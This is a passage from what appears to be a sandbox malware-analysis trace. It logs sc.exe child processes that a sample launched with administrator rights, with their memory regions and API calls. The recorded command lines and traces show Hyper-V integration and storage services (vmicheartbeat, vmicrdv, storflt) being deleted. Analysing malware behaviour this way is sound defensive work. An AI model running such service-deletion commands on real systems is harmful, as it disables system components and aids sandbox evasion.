region_type = private name = "private_0x000000a36db50000" filename = "" Region: id = 264 start_va = 0xa36dbd0000 end_va = 0xa36dbd3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a36dbd0000" filename = "" Region: id = 265 start_va = 0xa36dbe0000 end_va = 0xa36dbe0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a36dbe0000" filename = "" Region: id = 266 start_va = 0xa36dbf0000 end_va = 0xa36dbf1fff entry_point = 0x0 region_type = private name = "private_0x000000a36dbf0000" filename = "" Region: id = 267 start_va = 0x7df5ff3c0000 end_va = 0x7ff5ff3bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff3c0000" filename = "" Region: id = 268 start_va = 0x7ff67a710000 end_va = 0x7ff67a732fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a710000" filename = "" Region: id = 269 start_va = 0x7ff67a73d000 end_va = 0x7ff67a73dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73d000" filename = "" Region: id = 270 start_va = 0x7ff67a73e000 end_va = 0x7ff67a73ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73e000" filename = "" Region: id = 271 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 272 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 438 start_va = 0xa36dd50000 end_va = 0xa36de4ffff entry_point = 0x0 region_type = private name = "private_0x000000a36dd50000" filename = "" Region: id = 439 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 440 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4494 start_va = 0xa36db10000 end_va = 0xa36db1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000a36db10000" filename = "" Region: id = 4495 start_va = 0xa36db20000 end_va = 0xa36db26fff entry_point = 0x0 region_type = private name = "private_0x000000a36db20000" filename = "" Region: id = 4496 start_va = 0xa36dc00000 end_va = 0xa36dcbdfff entry_point = 0xa36dc00000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4497 start_va = 0xa36dcc0000 end_va = 0xa36dd3ffff entry_point = 0x0 region_type = private name = "private_0x000000a36dcc0000" filename = "" Region: id = 4498 start_va = 0xa36df90000 end_va = 0xa36df9ffff entry_point = 0x0 region_type = private name = "private_0x000000a36df90000" filename = "" Region: id = 4499 start_va = 0x7ff67a610000 end_va = 0x7ff67a70ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a610000" filename = "" Region: id = 4500 start_va = 0x7ff67a73b000 end_va = 0x7ff67a73cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a73b000" filename = "" Region: id = 4501 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4502 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4546 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4547 start_va = 0xa36dd40000 end_va = 0xa36dd46fff entry_point = 0x0 region_type = private name = "private_0x000000a36dd40000" filename = "" Region: id = 4548 start_va = 0xa36de50000 end_va = 0xa36de61fff entry_point = 0xa36de50000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 8 os_tid = 0xbf8 [0070.760] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0070.760] __set_app_type (_Type=0x1) [0070.760] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0070.760] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0070.760] SetThreadUILanguage (LangId=0x0) returned 0x409 [0070.982] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0070.982] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0070.982] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0070.982] _wcsicmp (_String1="delete", _String2="query") returned -13 [0070.982] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="start") returned -15 [0070.983] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0070.983] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0070.983] _wcsicmp (_String1="delete", _String2="control") returned 1 [0070.983] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0070.983] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0070.983] _wcsicmp (_String1="delete", _String2="config") returned 1 [0070.983] _wcsicmp (_String1="delete", _String2="description") returned -7 [0070.983] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0070.983] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0070.983] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0070.983] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0070.983] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0070.983] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0070.983] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0070.983] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0070.983] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0070.983] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0070.983] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0070.983] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0070.985] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xa36dd58c10 [0070.990] OpenServiceW (hSCManager=0xa36dd58c10, lpServiceName="vmicheartbeat", dwDesiredAccess=0x10000) returned 0xa36dd58910 [0070.991] DeleteService (hService=0xa36dd58910) returned 1 [0070.992] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0xa36dbcfb20, nSize=0x2, Arguments=0xa36dbcfba0 | out: lpBuffer="삐淕£") returned 0x1c [0070.994] GetFileType (hFile=0x24) returned 0x2 [0070.994] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xa36dbcfad0 | out: lpMode=0xa36dbcfad0) returned 1 [0071.108] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xa36dd5c090*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0xa36dbcfac8, lpReserved=0x0 | out: lpBuffer=0xa36dd5c090*, lpNumberOfCharsWritten=0xa36dbcfac8*=0x1c) returned 1 [0071.109] LocalFree (hMem=0xa36dd5c090) returned 0x0 [0071.109] LocalFree (hMem=0x0) returned 0x0 [0071.109] CloseServiceHandle (hSCObject=0xa36dd58910) returned 1 [0071.109] CloseServiceHandle (hSCObject=0xa36dd58c10) returned 1 [0071.109] LocalFree (hMem=0x0) returned 0x0 [0071.109] exit (_Code=0) Thread: id = 299 os_tid = 0x11dc Process: id = "8" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x67474000" os_pid = "0xb34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"vmicrdv\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 273 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 274 start_va = 0x7a2c1a0000 end_va = 0x7a2c1bffff entry_point = 0x0 region_type = private name = "private_0x0000007a2c1a0000" filename = "" Region: id = 275 start_va = 0x7a2c1c0000 end_va = 0x7a2c1d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a2c1c0000" filename = "" Region: id = 276 start_va = 0x7a2c1e0000 end_va = 0x7a2c25ffff entry_point = 0x0 region_type = private name = "private_0x0000007a2c1e0000" filename = "" Region: id = 277 start_va = 0x7a2c260000 end_va = 0x7a2c263fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a2c260000" filename = "" Region: id = 278 start_va = 0x7a2c270000 end_va = 0x7a2c270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a2c270000" filename = "" Region: id = 279 start_va = 0x7a2c280000 end_va = 0x7a2c281fff entry_point = 0x0 region_type = private name = "private_0x0000007a2c280000" filename = "" Region: id = 280 start_va = 0x7df5ffc30000 end_va = 0x7ff5ffc2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc30000" filename = "" Region: id = 281 start_va = 0x7ff67aaa0000 end_va = 0x7ff67aac2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67aaa0000" filename = "" Region: id = 282 start_va = 0x7ff67aac4000 end_va = 0x7ff67aac4fff entry_point = 0x0 region_type = private name = "private_0x00007ff67aac4000" filename = "" Region: id = 283 start_va = 0x7ff67aace000 end_va = 0x7ff67aacffff entry_point = 0x0 region_type = private name = "private_0x00007ff67aace000" filename = "" Region: id = 284 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 285 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 441 start_va = 0x7a2c3b0000 end_va = 0x7a2c4affff entry_point = 0x0 region_type = private name = "private_0x0000007a2c3b0000" filename = "" Region: id = 442 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 443 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3967 start_va = 0x7a2c1a0000 end_va = 0x7a2c1affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000007a2c1a0000" filename = "" Region: id = 3968 start_va = 0x7a2c1b0000 end_va = 0x7a2c1b6fff entry_point = 0x0 region_type = private name = "private_0x0000007a2c1b0000" filename = "" Region: id = 3969 start_va = 0x7a2c290000 end_va = 0x7a2c34dfff entry_point = 0x7a2c290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3970 start_va = 0x7a2c4b0000 end_va = 0x7a2c52ffff entry_point = 0x0 region_type = private name = "private_0x0000007a2c4b0000" filename = "" Region: id = 3971 start_va = 0x7a2c610000 end_va = 0x7a2c61ffff entry_point = 0x0 region_type = private name = "private_0x0000007a2c610000" filename = "" Region: id = 3972 start_va = 0x7ff67a9a0000 end_va = 0x7ff67aa9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a9a0000" filename = "" Region: id = 3973 start_va = 0x7ff67aacc000 end_va = 0x7ff67aacdfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aacc000" filename = "" Region: id = 3974 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3975 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3995 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3996 start_va = 0x7a2c350000 end_va = 0x7a2c356fff entry_point = 0x0 region_type = private name = "private_0x0000007a2c350000" filename = "" Region: id = 3997 start_va = 0x7a2c360000 end_va = 0x7a2c371fff entry_point = 0x7a2c360000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 9 os_tid = 0xb40 [0067.785] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0067.785] __set_app_type (_Type=0x1) [0067.785] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0067.785] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0067.785] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.964] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0067.964] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0067.964] _wcsicmp (_String1="delete", _String2="query") returned -13 [0067.964] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0067.964] _wcsicmp (_String1="delete", _String2="start") returned -15 [0067.964] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0067.964] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0067.964] _wcsicmp (_String1="delete", _String2="control") returned 1 [0067.964] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0067.964] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0067.964] _wcsicmp (_String1="delete", _String2="config") returned 1 [0067.964] _wcsicmp (_String1="delete", _String2="description") returned -7 [0067.964] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0067.964] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0067.964] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0067.965] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0067.965] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0067.965] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0067.965] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0067.965] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0067.965] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0067.965] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0067.965] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0067.965] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0067.966] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7a2c3b8bc0 [0067.970] OpenServiceW (hSCManager=0x7a2c3b8bc0, lpServiceName="vmicrdv", dwDesiredAccess=0x10000) returned 0x7a2c3b8b60 [0067.971] DeleteService (hService=0x7a2c3b8b60) returned 1 [0067.973] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x64, dwLanguageId=0x0, lpBuffer=0x7a2c25f8c0, nSize=0x2, Arguments=0x7a2c25f940 | out: lpBuffer="쀰ⰻz") returned 0x1c [0067.974] GetFileType (hFile=0x24) returned 0x2 [0067.974] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x7a2c25f870 | out: lpMode=0x7a2c25f870) returned 1 [0068.082] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x7a2c3bc030*, nNumberOfCharsToWrite=0x1c, lpNumberOfCharsWritten=0x7a2c25f868, lpReserved=0x0 | out: lpBuffer=0x7a2c3bc030*, lpNumberOfCharsWritten=0x7a2c25f868*=0x1c) returned 1 [0068.082] LocalFree (hMem=0x7a2c3bc030) returned 0x0 [0068.082] LocalFree (hMem=0x0) returned 0x0 [0068.082] CloseServiceHandle (hSCObject=0x7a2c3b8b60) returned 1 [0068.083] CloseServiceHandle (hSCObject=0x7a2c3b8bc0) returned 1 [0068.083] LocalFree (hMem=0x0) returned 0x0 [0068.083] exit (_Code=0) Thread: id = 273 os_tid = 0x1174 Process: id = "9" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x1cf9000" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"storflt\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 286 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 287 start_va = 0x1e2fe20000 end_va = 0x1e2fe3ffff entry_point = 0x0 region_type = private name = "private_0x0000001e2fe20000" filename = "" Region: id = 288 start_va = 0x1e2fe40000 end_va = 0x1e2fe53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e2fe40000" filename = "" Region: id = 289 start_va = 0x1e2fe60000 end_va = 0x1e2fedffff entry_point = 0x0 region_type = private name = "private_0x0000001e2fe60000" filename = "" Region: id = 290 start_va = 0x1e2fee0000 end_va = 0x1e2fee3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e2fee0000" filename = "" Region: id = 291 start_va = 0x1e2fef0000 end_va = 0x1e2fef0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e2fef0000" filename = "" Region: id = 292 start_va = 0x1e2ff00000 end_va = 0x1e2ff01fff entry_point = 0x0 region_type = private name = "private_0x0000001e2ff00000" filename = "" Region: id = 293 start_va = 0x7df5ffc30000 end_va = 0x7ff5ffc2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffc30000" filename = "" Region: id = 294 start_va = 0x7ff67ac80000 end_va = 0x7ff67aca2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ac80000" filename = "" Region: id = 295 start_va = 0x7ff67acad000 end_va = 0x7ff67acaefff entry_point = 0x0 region_type = private name = "private_0x00007ff67acad000" filename = "" Region: id = 296 start_va = 0x7ff67acaf000 end_va = 0x7ff67acaffff entry_point = 0x0 region_type = private name = "private_0x00007ff67acaf000" filename = "" Region: id = 297 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 298 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 444 start_va = 0x1e2ff50000 end_va = 0x1e3004ffff entry_point = 0x0 region_type = private name = "private_0x0000001e2ff50000" filename = "" Region: id = 445 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 446 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3940 start_va = 0x1e2fe20000 end_va = 0x1e2fe2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000001e2fe20000" filename = "" Region: id = 3941 start_va = 0x1e2fe30000 end_va = 0x1e2fe36fff entry_point = 0x0 region_type = private name = "private_0x0000001e2fe30000" filename = "" Region: id = 3942 start_va = 0x1e30050000 end_va = 0x1e3010dfff entry_point = 0x1e30050000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3943 start_va = 0x1e30110000 end_va = 0x1e3018ffff entry_point = 0x0 region_type = private name = "private_0x0000001e30110000" filename = "" Region: id = 3944 start_va = 0x1e302a0000 end_va = 0x1e302affff entry_point = 0x0 region_type = private name = "private_0x0000001e302a0000" filename = "" Region: id = 3945 start_va = 0x7ff67ab80000 end_va = 0x7ff67ac7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67ab80000" filename = "" Region: id = 3946 start_va = 0x7ff67acab000 end_va = 0x7ff67acacfff entry_point = 0x0 region_type = private name = "private_0x00007ff67acab000" filename = "" Region: id = 3947 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3948 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3958 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3959 start_va = 0x1e2ff10000 end_va = 0x1e2ff16fff entry_point = 0x0 region_type = private name = "private_0x0000001e2ff10000" filename = "" Region: id = 3960 start_va = 0x1e2ff20000 end_va = 0x1e2ff31fff entry_point = 0x1e2ff20000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 10 os_tid = 0x5c0 [0067.096] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0067.096] __set_app_type (_Type=0x1) [0067.096] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0067.096] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0067.096] SetThreadUILanguage (LangId=0x0) returned 0x409 [0067.416] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0067.416] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0067.416] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0067.416] _wcsicmp (_String1="delete", _String2="query") returned -13 [0067.416] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0067.416] _wcsicmp (_String1="delete", _String2="start") returned -15 [0067.416] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0067.417] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0067.417] _wcsicmp (_String1="delete", _String2="control") returned 1 [0067.417] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0067.417] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0067.417] _wcsicmp (_String1="delete", _String2="config") returned 1 [0067.417] _wcsicmp (_String1="delete", _String2="description") returned -7 [0067.417] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0067.417] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0067.417] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0067.417] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0067.417] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0067.417] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0067.417] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0067.417] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0067.417] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0067.417] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0067.417] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0067.417] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0067.419] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x1e2ff58d70 [0067.424] OpenServiceW (hSCManager=0x1e2ff58d70, lpServiceName="storflt", dwDesiredAccess=0x10000) returned 0x1e2ff58e00 [0067.425] DeleteService (hService=0x1e2ff58e00) returned 1 [0067.425] FormatMessageW (in: 